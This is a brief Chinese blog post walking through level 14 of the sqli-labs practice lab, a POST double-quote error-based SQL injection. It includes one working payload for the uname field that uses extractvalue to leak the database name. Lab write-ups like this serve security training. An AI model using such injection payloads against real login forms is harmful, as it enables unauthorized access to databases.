Sqli labs less14

less14的考点是POST单引号变形双注入

1.测试

 

 

 

 2.通过测试得知本less是双引号报错型注入,操作类似Less-13,可以通过布尔盲注和报错盲注,来进行解题

uname=1" and extractvalue(1,concat(0x7e,(select database()))) -- # &passwd=1

 

posted @ 2021-08-25 17:39  Nuyoah_QQ  阅读(78)  评论(0)    收藏  举报